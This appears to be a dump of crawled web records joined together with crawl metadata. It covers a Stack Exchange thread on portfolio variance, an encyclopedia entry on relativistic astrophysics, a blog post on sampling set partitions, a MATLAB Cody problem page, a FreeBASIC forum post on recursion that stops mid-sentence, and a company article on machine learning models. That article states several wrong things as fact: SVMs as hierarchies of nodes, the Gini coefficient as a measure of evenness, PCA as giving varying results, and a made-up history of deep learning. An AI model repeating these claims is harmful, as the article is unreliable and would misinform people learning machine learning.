essence of the method is described on page 8. Look at bullet #1: $V_1=V_0e^{r}$, where $V_1,V_0$ are future and current values of a portfolio, and $r$ is the return.\n• Look at bullet #4: when $r<<1$ you can apporoximate $V_1\\approx V_0+V_0r$.\n• Now, you can compute the variance of the future portfolio value: $Var[V_1]=V_0^2Var[r]$.\n• Where to get $r$ from? There are many different approaches. You seem to be trying the simplest one: assume that the variance is constant and estimate it from historical series.\n\nSo the rest is a technicality. Get the series of returns from the past: $r_t=\\ln(V_t/V_{t-1})$, and estimate its variance and other parameters. Note, as I wrote earlier: the log here is simply to compute the continuously compounded return. See Eq. 4.3 on page 46.\n\nThere's a lot of interesting stuff in the document. For instance, the returns in the distance past are probably less relevant to the tomorrow's return than the returns in the recent periods. So, they use EWMA to account for that.\n\n• Hmm. I'm a little lost because I don't think I'll have time to go through that VaR section of the document. I have some portfolio management notes that cover the topic as well, but I never took the course and just need to quickly figure out the calculation for Var(ln(Vtomorrow)). Any idea if that's in the document you referenced? – dvanderb Dec 4 '14 at 21:36\n• This is the doc which introduced VaR in the first place. So, yes, this stuff will be there, and it's written for applied folks, i.e. light on theory and easy to read. Also, you don't estimate $Var[\\ln(V_t)]$, but $Var[\\ln(r_t)]$ - returns, not log values. The diff of a log is a continuous return. – Aksakal Dec 4 '14 at 21:39\n• The problem for me is that I haven't done any portfolio management (I'm trying to figure this out for a web application and am learning as I go). I'm not sure why I would be able to estimate E[ln(Vt)] but not the variance. I guess I'll just need to keep reading and figure this out. Thanks for the help pointing me in the right direction. – dvanderb Dec 4 '14 at 21:52\n• @dvanderb, I updated the answer with more streamlines exposition – Aksakal Dec 5 '14 at 2:22" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9088972,"math_prob":0.9366579,"size":1172,"snap":"2021-21-2021-25","text_gpt3_token_len":272,"char_repetition_ratio":0.12243151,"word_repetition_ratio":0.0093896715,"special_character_ratio":0.23720136,"punctuation_ratio":0.08974359,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9964812,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-14T20:19:25Z\",\"WARC-Record-ID\":\"<urn:uuid:994ffc63-a89a-4b83-96b2-d45fc8475157>\",\"Content-Length\":\"168264\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2308e95d-5a69-4ba8-8493-2dd8635c6ab1>\",\"WARC-Concurrent-To\":\"<urn:uuid:72d319d3-ae86-4caf-bd8c-3669fdf9e95d>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/126675/variance-of-portfolio-future-values-based-on-return-distribution\",\"WARC-Payload-Digest\":\"sha1:BP2NWZCRGINMPFLFC5ML4KYEKM7KHGJ4\",\"WARC-Block-Digest\":\"sha1:Y6T7NAZX2PUBTKHN4CST7JY3PIGRNCIJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991207.44_warc_CC-MAIN-20210514183414-20210514213414-00395.warc.gz\"}"}
https://encyclopediaofmath.org/wiki/Relativistic_astrophysics,_mathematical_problems_in
[ "# Relativistic astrophysics, mathematical problems in\n\nProblems that arise in the study of astrophysical phenomena in which relativistic effects, i.e. effects of the special or general theory of relativity (cf. Relativity theory), are significant.\n\nMathematical problems in relativistic astrophysics are commonly divided into problems relating to cosmology — the science of the structure and the evolution of the Universe, and problems of relativistic astrophysics of individual celestial bodies. The solution of A.A. Friedman (cf. Cosmological models) is an example of a cosmological solution that describes the expansion (or contraction) of a homogeneous and isotropic Universe. Homogeneous anisotropic cosmological solutions have been classified (9 Bianchi types have been identified) and are well studied. Anisotropic and non-homogeneous solutions, being slight deviations from Friedman's solution (a linear approximation) have been studied in detail, and several simple non-linear solutions have been constructed.\n\nAn especially interesting problem is that of the presence of a singular point in the general cosmological solution at which infinite density of matter and an infinite space-time curvature is reached. Singularities have been shown to be unavoidable in the past under conditions that took place in the real Universe, and a general solution of the equations of the general theory of relativity with a singularity has been constructed. Active research is being conducted on the possibility of constructing cosmological solutions without a singularity, representing a departure from the framework of the traditional general theory of relativity.\n\nA large class of problems involves the study of the interaction of relic radiation (which occupies space) with matter during the expansion of the Universe, and of the physical processes capable of generating such radiation.\n\nThe mathematical problems in relativistic astrophysics for individual celestial bodies concern the equilibrium and stability of stars and constellations. Equilibrium masses have been found in white dwarfs and neutron stars, and the relativistic collapse of more massive stars (which turn into so-called \"black holes\" — objects that are only observable through their gravitational field) is also being studied. In connection with the search for and the study of relativistic objects (neutron stars, \"black holes\" , etc.), the problem of the accretion in them of matter with a magnetic field is studied.\n\nThe mathematical problems in relativistic astrophysics also include research on gravitational radiation. In a weak gravitational field in empty space the perturbations, e.g. the invariants of curvature, satisfy the wave equation, and the field of gravity extends in space like electromagnetic waves.\n\nHow to Cite This Entry:\nRelativistic astrophysics, mathematical problems in. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Relativistic_astrophysics,_mathematical_problems_in&oldid=24550\nThis article was adapted from an original article by A.A. Ruzmaikin (originator), which appeared in Encyclopedia of Mathematics - ISBN 1402006098. See original article" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85324603,"math_prob":0.8510068,"size":5130,"snap":"2021-43-2021-49","text_gpt3_token_len":1367,"char_repetition_ratio":0.1367538,"word_repetition_ratio":0.029247912,"special_character_ratio":0.2654971,"punctuation_ratio":0.20986359,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98718286,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-20T10:50:08Z\",\"WARC-Record-ID\":\"<urn:uuid:f7321166-5f0c-484d-aad2-f638efd81288>\",\"Content-Length\":\"21815\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f1069d90-ff6a-4cc5-9249-dcff1e960b9a>\",\"WARC-Concurrent-To\":\"<urn:uuid:f2b094b7-7972-4b65-abb0-e859c30bd852>\",\"WARC-IP-Address\":\"34.96.94.55\",\"WARC-Target-URI\":\"https://encyclopediaofmath.org/wiki/Relativistic_astrophysics,_mathematical_problems_in\",\"WARC-Payload-Digest\":\"sha1:6K3XNMWFBP3Q6TBFYUAB7W2VRRULTXTS\",\"WARC-Block-Digest\":\"sha1:JEXZ5OVUNADZBS37PZQZ77IT7Z4CKEDV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585305.53_warc_CC-MAIN-20211020090145-20211020120145-00259.warc.gz\"}"}
https://askboss.ai/all-you-need-to-know-about-machine-learning-models/
[ "# All You Need To Know About Machine Learning Models\n\n## Introduction To Machine Learning Models\n\nMachine learning models are software functions that have been trained to recognize certain types of patterns and make predictions. Machine Learning models are used in various fields like finance, retail, healthcare and marketing to learn with the given data and predict future outcomes. These models can be built for and applied to different industries as well.\n\nMachine learning starts with an functional architecture or layout for training. After training what emerges is effectively an algorithm, or a set of steps computers can then use to make predictions when new data is introduced. Models learn from the given datasets in order to derive patterns and make predictions for new data. The five machine learning models we will discuss today are classification models, regression models, clustering, dimensionality reduction, and deep learning.\n\n## Popular Machine Learning Algorithms\n\nThere are four main types of machine learning algorithms.\n\n1. Supervised learning - the learning model is taught by finding patterns in the data and learns from observations. The operator provides the machine a dataset with known inputs and outputs. The algorithm then makes predictions based on the inputs and known correct answers. The operator corrects these predictions until the learning algorithms operate with high accuracy.\n2. Semi-supervised - similar to supervised learning; however, it uses labelled and unlabelled data to help the learning model understand the data.\n3. Unsupervised- machine learning algorithm identifies patterns in data without an answer key or operator to provide instruction.\n4. Reinforcement learning - teaches the learning algorithms trial and error. The machine is active and adapts its approaches to achieve the best results possible.\n\n## Classification Model\n\nA classification model is a machine learning model that classifies new data into categories. To do this, the model uses patterns from training data to determine which category a particular piece of new data should belong to.\n\nThe main benefit of this model is that it can handle both labeled and unlabeled data. This means that the algorithm only needs to be shown an example of what the correct category for a particular piece of new data should be in order to determine how it should be classified.\n\nThere are different types of classification models, but the most popular are decision trees and support vector machines.\n\n## Decision Trees\n\nA decision tree is a type of classification model that uses a hierarchy of nodes to classify data. The algorithm starts by identifying a root node, which is the category that all new data will be classified into. From there, the algorithm splits the data into two categories, and determines which category each new piece of data should belong to. This process is repeated until all the data has been classified.\n\nThe advantage of using a decision tree is that it is easy to understand and interpret. The disadvantage is that they can be fragile, meaning that they can be easily broken by changes in the input dataset.\n\n### Model Parameters\n\nOnce a decision tree has been created, there are several model parameters that can be tuned to improve the accuracy of future predictions. The following is a summary of these model parameters.\n\n### Split Criteria\n\nThe split criterion determines how the algorithm should determine which category to place new data into. There are several different split criteria that can be used, but the most common are the entropy and Gini indices.\n\n### Entropy\n\nThe entropy criterion measures the amount of uncertainty associated with a particular category. The higher the entropy, the more uncertain the category is.\n\n### Gini Coefficient\n\nThe Gini coefficient is a measure of how evenly the data is distributed across the categories. The higher the Gini coefficient, the more even the distribution of data.\n\n### Impurity Measures\n\nAfter splitting up the dataset into two categories using a split criterion, impurity measures can be used to determine how pure each category is. There are different types of impurity measures that can be used, but the most common are the misclassification error and the Gini impurity.\n\n### Misclassification Error\n\nThe misclassification error is the percentage of data that is incorrectly classified into a particular category.\n\n### Gini Impurity\n\nThe Gini impurity is a measure of how evenly the data is distributed across the categories. The higher the Gini impurity, the more even the distribution of data.\n\n### Missing Values\n\nWhen a tree splits a dataset into two categories, it can have a negative impact on accuracy if there are any missing values in the input dataset. Imputation methods can be used to correct this issue by using mean or mode estimates for these missing values.\n\n## Support Vector Machines\n\nSupport vector machines (SVMs) are a type of classification model that is similar to decision trees, but has the advantage of being less fragile. Like decision trees, SVMs use a hierarchy of nodes to classify data, but they are able to do this with a much higher accuracy.\n\nIn order to create an SVM, a dataset is first divided into two categories: the training data and the testing data. The training data is used to create the model, and the testing data is used to evaluate the accuracy of the model.\n\nThe algorithm starts by determining the hyperplane that best separates the two categories. A hyperplane is simply a line or plane that divides a dataset into two categories. The algorithm then calculates the distance of each data point to the hyperplane. The data points that are closest to the hyperplane are classified into the same category, and the data points that are furthest away are classified into the other category.\n\n### Learning Model Parameters\n\nThere are several model parameters that can be tuned to improve the accuracy of future predictions. The following is a summary of these model parameters.\n\n### Kernel\n\nThe kernel is the function that is used to calculate the distance of each data point to the hyperplane. There are several different types of kernels that can be used, but the most common are the linear kernel and the polynomial kernel.\n\n### Threshold\n\nThe threshold is used to determine whether or not the data points are classified into the same category. The data points that are closest to the hyperplane are always included, but if there is no point within some threshold distance of the hyperplane, then the algorithm will classify all the data points on one side of it as part of one group and all those on the other side as part of the other group.\n\n### Iterations\n\nSVMs use a variety of iterations in order to continually improve accuracy and avoid overfitting. Overfitting occurs when the model becomes too complex and begins to fit noise in the data instead of the actual patterns that would allow it to make accurate predictions for future data sets. When it comes time to use the SVM for prediction, the number of iterations that were used to create the model can be reduced in order to improve performance.\n\n### C-Support Vectors\n\nThe C-support vectors are a subset of the support vectors that are used to improve the accuracy of predictions. The algorithm calculates the distance of each data point to each of the support vectors, and then selects the support vectors that have the smallest distance. These support vectors are then used to improve the accuracy of predictions.\n\n## Regression Models\n\nRegression models make predictions about a dependent variable based on the value of one or more independent variables. These models are often used to forecast sales volume, forecast election outcomes, and make movie recommendations.\n\nThere are several different types of regression models, but the most popular are linear regression and logistic regression.\n\n## Linear Regression\n\nLinear regression is a type of regression model that uses a straight line to predict the value of the dependent variable. The advantage of this model is that it is easy to understand and interpret. The disadvantage is that it can easily be broken by changes in the input dataset.\n\n### Model Parameters\n\nOnce a linear regression model has been created, there are several model parameters that can be tuned to improve the accuracy of future predictions. The following is a summary of these model parameters.\n\n### Regression Coefficients\n\nThe regression coefficients are numerical weights that are used to multiply the independent variables, so that they can be combined into a single number. The regression coefficients provide insight on which of the independent variables may be most important in predicting the dependent variable.\n\n### Standard Error\n\nThe standard error of the regression is used to measure how accurate future predictions will be based on past data. The lower the standard error, the more accurate the predictions will be.\n\n### Residuals\n\nThe residuals are the difference between the observed values of the dependent variable and the predicted values of the dependent variable. These residuals can be used to identify any patterns in the data that were not captured by the regression model.\n\n## Logistic Regression\n\nLogistic regression is a type of regression model that is used to predict the probability of a particular event occurring. The advantage of this model is that it can be used to predict binary outcomes, such as whether or not a customer will buy a product. The disadvantage is that it is more complex than linear regression and can be difficult to interpret.\n\n## Clustering\n\nWith the rapid evolution of technology, machine learning models are being used to solve business challenges. The most popular algorithm for solving these problems is clustering. Clustering algorithms identify groups of similar data points together and produce patterns within those groups.\n\nThe advantage of using clustering algorithms is that they can be used on large datasets to find. Clustering is the process of grouping data points together based on their similarities. There are several different types of clustering algorithms, but the most popular are K-means clustering and hierarchical clustering.\n\n## K-Means Clustering\n\nK-means clustering is a type of clustering algorithm that uses a distance metric to group data points together. The algorithm starts by randomly selecting a number of data points, called the centroids, and then groups the remaining data points together based on their distance from the centroids.\n\nThe advantage of this algorithm is that it is fast and easy to implement. The disadvantage is that it can produce clusters that are not well-defined.\n\n## Hierarchical Clustering\n\nHierarchical clustering is a type of clustering algorithm that starts by placing each data point in its own cluster. Then, the algorithm merges smaller clusters together until there are only a few large clusters left.\n\nThe advantage of this model is that it can provide several different levels of detail for each group of data points and can be used to identify outliers. The disadvantage is that it may produce clusters that overlap and merge together.\n\n## Dimensionality Reduction\n\nOne of the challenges of machine learning is that the data can often be quite large and complex. This can make it difficult to find patterns and make predictions. Dimensionality reduction is a technique that can be used to reduce the size of the data, so that it is easier to work with.\n\nThere are several different types of dimensionality reduction algorithms, but the most popular are principal component analysis (PCA) and t-distributed Stochastic Neighbor Embedding (t-SNE).\n\n## Principal Component Analysis (PCA)\n\nPrincipal component analysis is a type of dimensionality reduction algorithm that uses a matrix decomposition to reduce the number of dimensions in the data. The algorithm starts by computing the eigenvalues and eigenvectors of the data matrix. Then, the first eigenvector is chosen as the first principal component and the second eigenvector is chosen as the second principal component.\n\nThe advantage of this algorithm is that it can make predictions even on large datasets. The disadvantage is that it can produce different results when run multiple times on the same dataset.\n\n## Deep Learning\n\nDeep learning is a subset of artificial intelligence that uses artificial neural networks to automate tasks. The algorithm is programmed with structured data and has the ability to learn on its own to improve its performance.\n\nA research team at Microsoft conducted the first successful deep learning experiment in 2008, where they trained an algorithm to recognize handwritten digits from the MNIST database.\n\nThe advantage of deep learning is that it can be used for complicated tasks like image recognition, speech recognition, language translation, and emotion detection. The disadvantage of deep learning is that it requires large amounts of data sets to train the algorithm with.\n\n## Machine Learning Conclusion\n\nMachine Learning Models are an important part of artificial intelligence. Using algorithms, they can learn from the given data to make predictions for future behavior with high accuracy.\n\nMachine learning models when it comes to data modeling is a subset of artificial intelligence that uses algorithms in order to categorize large datasets and form predictions for future behavior with high accuracy. The algorithm learns from the given datasets in order to derive patterns and make predictions for new data. The advantage of using clustering algorithms is that they can be used on large datasets to find groupings or clusters based on their similarities.\n\nIf you'd like to learn more about machine learning models or want help implementing these principles in your own company, talk to one of our DATA BOSSES! Our team would be happy to partner with you and create a roadmap that provides you with predictive analytics and a design engine.\n\nSubscribe to the Latest Insight\n\nAchieve AI at Scale" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91655546,"math_prob":0.9406281,"size":13764,"snap":"2022-40-2023-06","text_gpt3_token_len":2524,"char_repetition_ratio":0.15305233,"word_repetition_ratio":0.15784712,"special_character_ratio":0.17538506,"punctuation_ratio":0.0712191,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9865694,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-27T18:47:52Z\",\"WARC-Record-ID\":\"<urn:uuid:e18fbdfd-aead-4cbb-b5a4-895b637fbd65>\",\"Content-Length\":\"384100\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:aeef6341-a66a-4f1d-8896-8e86fa023dc5>\",\"WARC-Concurrent-To\":\"<urn:uuid:a735e600-c621-41ff-a463-ddedb505a092>\",\"WARC-IP-Address\":\"35.209.35.36\",\"WARC-Target-URI\":\"https://askboss.ai/all-you-need-to-know-about-machine-learning-models/\",\"WARC-Payload-Digest\":\"sha1:TSQYRVWZOHQSU6365BIQGXEVB7CWK36Z\",\"WARC-Block-Digest\":\"sha1:RG2QU52Q7ACSU5LJ4BHX3YQ5TK6SIUYZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764495001.99_warc_CC-MAIN-20230127164242-20230127194242-00090.warc.gz\"}"}
http://thousandfold.net/cz/2013/09/
[ "## Sampling uniformly from the set of partitions into a fixed number of nonempty sets\n\nIt’s easy to sample uniformly from the set of partitions of a set: you pick a number of bins using an appropriate exponential distribution, then randomly i.i.d. toss each element of the set into one of those bins. At the end of this procedure, the nonempty bins will constitute your uniformly sampled random partition. [literature ref: “Generation of a random partition of a finite set by an urn model” by Stam, 1983; pretty pictures ref: see this blog post].\n\nIs there a similarly efficient and simple algorithm for sampling uniformly from the set of partitions into a fixed number of nonempty sets? The only algorithm I’m aware of takes advantage of the fact that the number of such partitions is given by $$\\left\\{n \\atop p \\right\\}$$, a Stirling number of the second kind, if the set has $$n$$ elements and we desire $$p$$ nonempty subsets in the partition. In particular, we have the identity\n$\\left\\{ {n \\atop p} \\right\\} = \\left\\{ {n-1 \\atop p-1} \\right\\} + p \\left\\{ {n-1 \\atop p} \\right\\}$\nthat comes from observing that the only two ways to construct a partition of $$n$$ elements into $$p$$ nonempty sets are to: either partition the first $$n-1$$ elements into $$p-1$$ nonempty sets and take the remaining singleton as our final set in the partition, or we partition the first $$n-1$$ elements into $$p$$ nonempty sets and place the remaining element into any of these $$p$$ sets.\n\nThis observation leads to a straightforward recursive sampling procedure: with probability $$\\left\\{ {n-1 \\atop p-1} \\right\\}/\\left\\{ {n \\atop p} \\right\\}$$, use the first procedure with a randomly sampled partition of the first $$n-1$$ elements into $$p-1$$ nonempty sets, otherwise use the second procedure with a randomly sampled partition of the first $$n-1$$ elements into $$p$$ nonempty sets.\n\nUnfortunately, this is not an efficient procedure for several reasons. In particular, it requires computing Stirling numbers, and taking their ratio. When $$n,k$$ are large, this will require both computational time and, more of a practical impediment, arbitrary-precision arithmetic. A straightforward implementation also relies on recursion, which is infeasible when $$n$$ is large. Clearly one can implement this algorithm without using recursion; one can also use an asymptotic expansion of the Stirling numbers to approximate the ratio $$\\left\\{ {n-1 \\atop p-1} \\right\\}/\\left\\{ {n \\atop p} \\right\\}$$ when $$n,k$$ are large … but this comes at the cost of some unspecified inaccuracy and just doesn’t feel right.\n\nSo the question remains: is there an efficient and simple way to sample uniformly from the set of partitions into a fixed number of nonempty sets?\n\n## I miss Mathematica\n\nWhy? Because Mathics is not up to helping me determine if indeed\n$f(\\{A_1, \\ldots, A_p\\}) = \\frac{(n-p)!^2}{n! p!} \\left(\\frac{1}{p} \\right)^{n-p} \\frac{|A_1|^2 \\cdots |A_p|^2}{|A_1|!\\cdots |A_p|!}$\nis a pmf over the set of partitions of the set $$\\{1, \\ldots, n\\}$$ into $$p \\leq n$$ nonempty sets. In particular, the sets $$A_1, \\ldots, A_p$$ in the formula above satisfy $$|A_1| + \\ldots +|A_p| = n$$ and $$|A_i| \\geq 1$$ for all $$i.$$\n\nI feel like I could empirically test this easily in Mathematica, but OMG trying to do it in Matlab is a real pain, so I gave up. Combinatorics or set manipulation in Matlab in general is an exercise in trying to make a smoothie with a grater: you can do it, eventually, but it’s going to take forever and make a mess." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.872324,"math_prob":0.99839914,"size":2660,"snap":"2019-51-2020-05","text_gpt3_token_len":645,"char_repetition_ratio":0.14307229,"word_repetition_ratio":0.14588235,"special_character_ratio":0.24924812,"punctuation_ratio":0.08571429,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997689,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-29T04:22:05Z\",\"WARC-Record-ID\":\"<urn:uuid:84dd2242-53f0-4b18-ba26-bb5fe05e653e>\",\"Content-Length\":\"25746\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:58590190-55e2-45de-bdf4-f1c43f5e347d>\",\"WARC-Concurrent-To\":\"<urn:uuid:5155cc42-1cad-4bff-a463-83b3c9382130>\",\"WARC-IP-Address\":\"208.97.151.24\",\"WARC-Target-URI\":\"http://thousandfold.net/cz/2013/09/\",\"WARC-Payload-Digest\":\"sha1:3PCFQWC2ICRRLZRVPM36EVJJK6K5K566\",\"WARC-Block-Digest\":\"sha1:6XW6P4DWOKYT5FPPWWGPRZ56FCFB5AD3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251788528.85_warc_CC-MAIN-20200129041149-20200129071149-00383.warc.gz\"}"}
https://ch.mathworks.com/matlabcentral/cody/problems/649-return-the-first-and-last-character-of-a-string/solutions/2685410
[ "Cody\n\n# Problem 649. Return the first and last character of a string\n\nSolution 2685410\n\nSubmitted on 13 Jul 2020 by 雨晴 张\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nx = 'abcde'; y_correct = 'ae'; assert(isequal(stringfirstandlast(x),y_correct))\n\n2   Pass\nx = 'a'; y_correct = 'aa'; assert(isequal(stringfirstandlast(x),y_correct))\n\n3   Pass\nx = 'codyrocks!'; y_correct = 'c!'; assert(isequal(stringfirstandlast(x),y_correct))\n\n### Community Treasure Hunt\n\nFind the treasures in MATLAB Central and discover how the community can help you!\n\nStart Hunting!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5208728,"math_prob":0.83667415,"size":592,"snap":"2020-45-2020-50","text_gpt3_token_len":165,"char_repetition_ratio":0.14795919,"word_repetition_ratio":0.0,"special_character_ratio":0.28716215,"punctuation_ratio":0.13592233,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9625992,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-01T06:14:33Z\",\"WARC-Record-ID\":\"<urn:uuid:22f2a727-c3e1-4bdd-89a5-51d3fe4f4335>\",\"Content-Length\":\"80342\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ad736340-3b3b-45ff-b25c-b973bb78c450>\",\"WARC-Concurrent-To\":\"<urn:uuid:9bb66d8d-f659-4690-9abc-d51dcb46c5ad>\",\"WARC-IP-Address\":\"184.25.198.13\",\"WARC-Target-URI\":\"https://ch.mathworks.com/matlabcentral/cody/problems/649-return-the-first-and-last-character-of-a-string/solutions/2685410\",\"WARC-Payload-Digest\":\"sha1:FKNUCXYTTBNNFIZRJRCHD36PH4WMJ4JE\",\"WARC-Block-Digest\":\"sha1:MIAI4YAHLBXYIRTV67TJ46KCBUIVN64C\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141652107.52_warc_CC-MAIN-20201201043603-20201201073603-00529.warc.gz\"}"}
https://www.freebasic.net/forum/viewtopic.php?f=9&t=27026&amp
[ "## How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nForum for discussion about the documentation project.\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nIteration and recursion are two very useful ways to program, especially to perform a certain number of times a certain script, and thus allow optimization of the code. If iteration is relatively easy to understand, recursion is a concept not necessarily obvious at the beginning.\nWhen speaking of a recursive procedure (subroutine or function), we refer to a syntactic characteristic: the procedure, in its own definition, refers to itself (it calls itself).\nBut when talking about recursive process, linear or tree, we are interested in the process flow, not in the syntax of the procedure's writing.\nThus, a procedure can have a recursive definition but correspond to an iterative process.\n\nSome treatments are naturally implemented as a recursive algorithm (although this is not always the most optimal solution).\nThe main problem of the recursive approach is that it consumes potentially a lot of space on the execution stack: from a certain level of \"depth\" of recursion, the space allocated for the execution stack of the thread is exhausted, and causes an error of type \"stack overflow\".\nRepeatedly calling the same procedure can also make the execution slower, although this may make the code easier.\nTo increase the speed of execution, simple recursive algorithms can be recreated in little more complicated iterative algorithms using loops that execute much faster.\n\nWhat is the use of recursion if it increases the execution time and memory space compared to an iterative solution?\nThere are still cases where it is not possible to do otherwise, where iterative translation does not exist or, where it exists, is much heavier to implement (requiring for example a dynamic storage capacity to substitute for the execution stack).\n\n1) Recursion and Iteration\nRecursion and iteration both repeatedly execute the instruction set:\n• Recursion occurs when an instruction in a procedure calls the procedure itself repeatedly.\n• Iteration occurs when a loop executes repeatedly until the control condition becomes false.\nThe main difference between recursion and iteration is that recursion is a process always applied to a procedure, while iteration is applied to a set of instructions to execute repeatedly.\n1.1) Definition of Recursion\nFreeBASIC allows a procedure to call itself in its code. This means that the procedure definition has a procedure call to itself. The set of local variables and parameters used by the procedure are newly created each time the procedure is called and are stored at the top of the execution stack. But every time a procedure calls itself, it does not create a new copy of that procedure. The recursive procedure does not significantly reduce the size of the code and does not even improve the memory usage, but it does a little bit compared to iteration.\n\nTo end recursion, a condition must be tested to force the return of the procedure without giving a recursive call to itself. The absence of a test of a condition in the definition of a recursive procedure would leave the procedure in infinite recursion once called.\n\nNote: When the parameters of a recursive procedure are passed by reference, take care to work with local variables when the code body needs to modify their values.\n\n1. Simple example with a recursive function which returns the factorial of the integer:\nThe code body of the recursive function is defined by using the recursive definition of the factorial function:\nCase (n = 0) : factorial(0) = 1\nCase (n > 0) : factorial(n) = n * factorial(n-1)\nThe first line allows to determine the end condition: 'If (n = 0) Then Return 1'\nThe second line allows to determine the statement syntax which calls the function itself: 'Return n * factorial(n - 1)'\n\nFull code:\n\nCode: Select all\n\n`Function recursiveFactorial (Byval n As Integer) As Integer  If (n = 0) Then                         '' end condition    Return 1  Else                                    '' recursion loop    Return n * recursiveFactorial(n - 1)  '' recursive call  End IfEnd Function`\n1.2) Definition of Iteration\nIteration is a process of repeatedly executing a set of instructions until the iteration condition becomes false.\nThe iteration block includes the initialization, the comparison, the execution of the instructions to be iterated and finally the update of the control variable.\nOnce the control variable is updated, it is compared again and the process is repeated until the condition in the iteration is false.\nIteration blocks are \"for\" loop, \"while\" loop, ...\n\nThe iteration block does not use the execution stack to store the variables at each cycle. Therefore, the execution of the iteration block is faster than the recursion block. In addition, iteration does not have the overhead of repeated procedure calls that also make its execution faster than a recursion.\nThe iteration is complete when the control condition becomes false.\n\n1. Simple example with a iterative function which returns the factorial of the integer:\nThe code body of the iterative function is defined by using the iterative definition of the factorial function:\nCase (n = 0) : factorial(0) = 1\nCase (n > 0) : factorial(n) = (1) * ..... * (n - 2) * (n - 1) * (n)\nThe first line allows to determine the cumulative variable initialization: 'result = 1'\nThe second line allows to determine the statement syntax which accumulates: 'result = result * I'\n\nFull code:\n\nCode: Select all\n\n`Function iterativeFactorial (Byval n As Integer) As Integer  Dim As Integer result = 1  '' variable initialization  For I As Integer = 1 To n  '' iteration loop    result = result * I      '' iterative accumulation  Next I  Return resultEnd Function`\n2) Replace Recursion with Iteration\nWhatever the problem to be solved, there is the choice between the writing of an iterative procedure and that of a recursive procedure. If the problem has a natural recursive structure, then the recursive program is a simple adaptation of the chosen structure. This is the case of the factorial functions (seen above) for example. The recursive approach, however, has drawbacks: some languages ​​do not allow recursion (like the machine language!), and a recursive procedure is often expensive in memory (for execution stack) as in execution time.\n\nThese disadvantages can be overcome by transforming the recursive procedure, line by line, into an iterative procedure: it is always possible.\nReplace a recursion with an iteration allows to suppress the limitation on the number of cycles due to the execution stack size available. But for an iteration with its own storage stack, the time spent to calls to the procedures for pushing and pulling stack data is generally greater than the one for passing the parameters of a recursive procedure at each calling cycle.\n\nThe complexity of the iterative procedure obtained by such a transformation depends on the structure of the recursive procedure:\n• for some form of recursive procedure (see below the tail recursion), the transformation into an iterative procedure is very simple by means of just defining local variables corresponding to the parameters of the recursive procedure (passed arguments),\n• at opposite for other forms of recursive procedure (non-tail recursions), the use of a user storage stack in the iterative procedure is necessary to save the context, as the recursive calls do (values ​​of the passed arguments at each call):\n- when executing a recursive procedure, each recursive call leads to push the context on execution stack,\n- when the condition of stopping recursion occurs, the different contexts are progressively popped from execution stack to continue executing the procedure.\n2.1) Replace Tail Recursion with Simple Iteration\nThe recursive procedure is a tail recursive procedure if the only recursive call is at the end of the recursion and is therefore not followed by any other statement:\n- for a recursive subroutine, the only recursive call is at the end of the recursion,\n- for a recursive function, the only recursive call is at the end of the recursion and consists in taking into account the return of the function without any other additional operation on it.\nA tail recursive procedure is easy to transform into an iterative procedure.\nThe principle is that if the recursive call is the last instruction of a procedure, it is not necessary to keep on the execution stack the context of the current call, since it is not necessary to return to it:\n- it suffices to replace the parameters by their new values, and resume execution at the beginning of the procedure,\n- the recursion is thus transformed into iteration, so that there is no longer any risk of causing an overflow of the execution stack.\nSome non-tail recursive procedures can be transformed into tail recursive procedures, sometimes with a little more complex code, but even before they are subsequently transformed into iterative procedures, these tail recursive procedures often already gain in memory usage and 